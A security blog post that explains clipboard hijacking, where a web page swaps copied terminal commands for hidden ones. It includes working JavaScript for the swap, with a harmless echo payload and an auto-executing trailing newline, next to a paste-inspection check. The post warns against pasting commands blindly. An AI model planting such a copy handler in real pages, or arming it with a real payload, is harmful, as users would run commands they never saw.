Compromised Code on the Web
An old issue is making a comeback. Sound familiar? You’re sitting at your computer, and some glitchy service or software isn’t behaving as you expect. You’ve exhausted your mental toolkit and don’t feel like digging through the documentation - assuming it even exists.
So, you turn to your favorite search engine to describe the suspected error. Often, this works surprisingly well, with a less-than-reputable site popping up claiming to have the solution to your exact problem. All you need to do is type three or four lines into the terminal - or better yet, just copy the code directly to save time.
Here’s where it gets tricky. On some of these sketchy sites, the text you highlight and press Cmd/Ctrl + C on is not what ends up on your clipboard: a JavaScript handler on the page’s copy event cancels the normal copy and writes its own text instead. The page itself looks unchanged, so nothing gives the swap away until you have pasted it.
By the time the seemingly helpful code lands in your terminal, it is often already too late. The tactic works best with long, multi-line snippets, where an extra line hides easily. A newline appended to the copied text can even make the shell execute it the moment it is pasted, without waiting for you to press Enter; recent versions of bash and zsh enable bracketed paste by default, which holds pasted text until you confirm it, but older shells and many terminal emulators do not.
This lets an attacker run arbitrary commands with the current user’s permissions, and as root if the snippet begins with sudo and the victim types their password at the prompt.
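The mechanism described above, as an added example that is not the article’s own script: a copy-event handler that swaps a harmless echo onto the clipboard, plus a small check a user or tool could run on pasted text before executing it. The function names, the PAYLOAD string, and the selectionText field used by the stand-in event object are assumptions made for this illustration; in a browser the handler reads the real selection and is attached to the document’s copy event.

```javascript
// Added example, not the article's code: a minimal clipboard hijack of the
// kind the article describes, with a harmless payload, next to a check for it.

// What the attacker wants on the clipboard. Here it is a harmless echo; the
// trailing "\n" is the appended Enter that makes an unprotected terminal run
// the pasted line immediately. (PAYLOAD is an assumed value for this demo.)
const PAYLOAD = 'echo "your clipboard was swapped on $(hostname)"\n';

// Decide what goes on the clipboard for a given selection. The page's visible
// text is never changed; only the copied bytes differ from what was selected.
function buildClipboardText(selectedText) {
  // Only hijack selections that look like a shell command line, so copying
  // ordinary prose from the page behaves normally and does not reveal the swap.
  if (!/^\s*(sudo\s+)?[a-z][\w.-]*(\s|$)/.test(selectedText)) {
    return selectedText;
  }
  return PAYLOAD;
}

// Copy-event handler. `event` is a ClipboardEvent in the browser; outside a
// browser the assumed `selectionText` field of a constructed event stands in
// for window.getSelection(). Returns true when the clipboard was replaced.
function hijackCopy(event) {
  const selected = typeof window !== 'undefined' && window.getSelection
    ? String(window.getSelection())
    : (event.selectionText || '');
  const replacement = buildClipboardText(selected);
  if (replacement === selected) return false;
  event.clipboardData.setData('text/plain', replacement);
  event.preventDefault(); // otherwise the browser copies the real selection too
  return true;
}

// Defensive side: compare what was visibly selected with what the clipboard
// actually holds. Returns a list of reasons the paste is suspicious (empty
// when the two agree and nothing would auto-execute).
function inspectPaste(visibleText, clipboardText) {
  const findings = [];
  if (clipboardText.trimEnd() !== visibleText.trimEnd()) {
    findings.push('clipboard text differs from the selected text');
  }
  if (/\r?\n\s*$/.test(clipboardText)) {
    findings.push('trailing newline would auto-execute in an unprotected terminal');
  }
  // Control characters other than tab/newline/CR are never legitimate in a
  // command line and are a classic way to hide text from the eye.
  if (/[\u0000-\u0008\u000b\u000c\u000e-\u001f\u007f]/.test(clipboardText)) {
    findings.push('contains control characters');
  }
  return findings;
}

// In a real page this one line is all the attacker needs.
if (typeof document !== 'undefined') {
  document.addEventListener('copy', hijackCopy);
}
```

Run in a browser console on any page and copy a line that starts with a command name; the clipboard will hold the echo line instead, while the page looks exactly as before. The inspectPaste check is the part worth keeping: it is what a paste-safe terminal or a browser extension would apply before anything reaches the shell.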
Here’s a harmless example to try:
sudo apt-get update
The script I created simply displays your computer’s ID and outputs an echo message.
Avoid copying code from websites straight into your terminal. Paste it into a text editor first, or into a shell with bracketed paste enabled, and check for extra lines, trailing newlines and anything you did not select before you run it.